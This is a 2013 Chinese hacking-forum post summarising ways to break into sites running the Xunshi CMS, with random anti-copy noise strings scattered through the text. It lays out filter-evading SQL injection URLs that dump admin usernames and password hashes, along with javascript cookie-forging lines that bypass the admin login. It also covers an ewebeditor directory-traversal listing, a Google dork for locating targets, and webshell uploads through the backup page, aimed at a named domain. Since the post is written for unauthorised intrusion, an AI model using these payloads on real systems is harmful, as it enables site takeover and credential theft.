中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]
作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘
8 L. c% g: n6 h( G* \! F  F. m; c+ C5 e: l
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新): g" ], @4 i! k, P" V' G

9 u) a9 _6 Y' c! F9 r! p以下本文总结来自黑防去年第9期杂志上的内容...
, o) s/ ]2 _  D2 T- |+ @
- C; ]# U# E. w) H9 y先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
+ j2 G: B8 B# _& }
9 W# L0 K/ d" n( r0 e. i26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 - [+ k" @! m9 |  g# U$ _* T

/ W8 e( _: h6 f记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况. ]5 X7 c9 R6 m+ |, Z8 S, z
这里一个注入
/ S7 ]1 V/ f1 l, r5 Z) K
: H5 x5 Q: H3 \5 {% J效果如图:
6 ^/ ~% p, ]* N5 C. O. X9 J1 I2 O) v' ]7 a! N( c2 i+ o

- _8 d) x: T7 P; d3 H8 Q! q
4 R" Q6 I4 K: U' Y: N这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
2 T9 U9 m7 e- Z! H1 b3 L( D) l4 {7 J* o! A' [! a6 L+ r4 `# g
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去/ {1 j# n" V2 O2 j, h; r- w1 @
( |2 L# ]$ b, m! i% x+ C, n
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
, u- V. |  r# O% s( T1 a; q% m- n+ X8 \5 ~0 T- {! ?$ w
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
, A7 p1 l8 ?$ N0 i; k
* a; |7 Y& d- D因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞7 _  T" q9 G8 E1 [7 t! v8 n

5 m. A0 j: n+ E0 L' \4 V它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
3 o/ ]- w2 L, W  I$ C; _; d+ U9 a6 b+ R) C
访问这页面来列目录..步骤如下:
" K  `' T  h% c* }8 K8 ?
/ B2 S& C$ p  Djavascript:alert(document.cookie="admindj=1") 8 R- L2 `7 M  }/ T

6 x( D2 S9 L) e/ x8 j8 Zhttp://www.political-security.co ... asp?id=46&dir=../..) h! r/ ~; w0 E
! X$ _; G' v' K. |/ C
效果如图:
* D) v# q5 W/ o& f* i6 k, p! |( ^+ K1 o' K* S2 ^0 A

% c5 n1 D% @0 b
. ]4 T! A8 F+ F, Q( E% I这样全站目录都能瞧了..找到后台目录..进去..
  w& M; P! `7 o* F' G7 [4 @" ^" V7 x
/ S' @6 x) Y/ L! }- l3 f那么进了后台怎么拿shell??上传--备份就ok了..: g/ C9 t4 P5 C" Z8 `

0 a/ n  P# l# }4 h那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..# p" p+ ]6 r8 P# E+ }  o
0 t2 v8 B+ t8 p3 d6 _+ x" K$ ~1 B
这个我也碰到过一次..你都可以通过列目录来实现..
9 R% r3 e- m; ~
! L0 l5 V- O) Fjavascript:alert(document.cookie="admindj=1")
+ u% b4 u* ^$ L, p1 T& |9 g; d/ H% D  i, a9 t! A
http://www.political-security.co ... p?action=BackupData
3 K0 [% n" x; Z& M) S4 X0 M8 s4 J6 ^$ {: v
备份ok..
& N" a9 q; J7 \* ~3 X5 W# V8 W: \7 ~7 R/ g
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
; S' E$ x4 r6 K3 \5 q( Y, o3 u
% o. Z9 l( ~) x9 X0 O, ^% V在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
3 S; d) H. [2 v, F
% p) @9 i# v! F& Y. O然后访问此页面进行注入..步骤如下:/ w0 J( c/ j* A( g/ g$ [
& P$ D) @4 v( ?  p5 M7 q$ w
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")) n7 ]% [6 C$ t( s$ W/ x

  u- i7 w1 v/ }然后请求admin/admin_chk.asp页面4 P2 o) D1 I4 \' I/ Y0 w$ r! j9 o- k
& c2 ]$ C- B& _7 [3 o
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
+ p; P5 @3 m. u, a7 X- Z6 q$ h. I! B
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
/ \) y" r, O& f
, S  f2 }- J0 B6 ]0 D0 m9 @效果如图所示:0 Z# a5 U1 n. ]4 s5 ~
; k+ ]' s1 F8 Q0 j2 o2 _
: n0 b" i0 Z9 b& A9 q7 N1 W
/ T; L, {! J4 `% Q
讯时漏洞2
+ c6 ~1 e3 S. D* x# s' B- Ngoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
5 o2 u$ ~+ c2 _- v  Q5 a, U! Q
1 g1 N; m0 _" }  R* j9 i1、/admin/admin_news_pl_view.asp?id=1
# n, O0 ^6 t9 w//id任意 填入以下语句
+ H9 c" e4 `, U- L  }( A* |) h  C: Y. v
& _, }; ^, f! |+ X! {4 E8 L. C2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!# c- c( `: w" p5 m& u) R
& U0 H  N0 N% _1 Y! l
1 K" D) h% S9 y/ p3 K# R; [6 E

  q5 A6 ]8 b5 j3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='" k( K0 E7 m5 u# P! Z; c* D
; g# R1 |; N2 m, m

, l) T" [  Z( u9 @9 z4 V6 _5 ^! z2 x) J- d
爆出管理员帐号和密码了
' G1 {, c+ D5 A8 q7 K: q/ ?2 s % _( a. l) C! u& r, p7 I# }9 g

4 G* ]1 |( d: E* t$ ~1 N( T" X$ D8 ]! y; c
4、cookies进后台' s7 ^( U7 W( ?- C* u

3 f  Q9 Z9 C9 B& e3 F& r5 f  F% Ejavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));  W! P, e' k4 p
* h7 D$ T) q& C2 D" F* B  _0 Y0 H9 S

, ]% R4 V; m/ t( T9 ]; m3 r( t  G" e3 n
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!- Z4 F& o, L* G7 P# K5 ^2 Y
- f9 {) {1 t4 ?7 x! e  b) [/ k
. ~2 q1 |* h; a# K  a' I  k
* K% Z5 N- o/ |- p
6、后台有上传和备份取SHELL不难。! Y. f% l' p1 R2 n; y$ x, a$ S
% q5 V8 E6 T8 X) |. B( v
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..4 U" r/ k# C$ ?5 z! P2 I5 r

* |! Q! c4 R/ R+ u4 M& B7 h9 X逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!8 E- H6 w5 n1 ^" r

2 T% A: }8 O# W+ e% ~
4 \- j' d; H# y7 N! C' b2 Q! b! d* }+ w& u5 ?' _




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2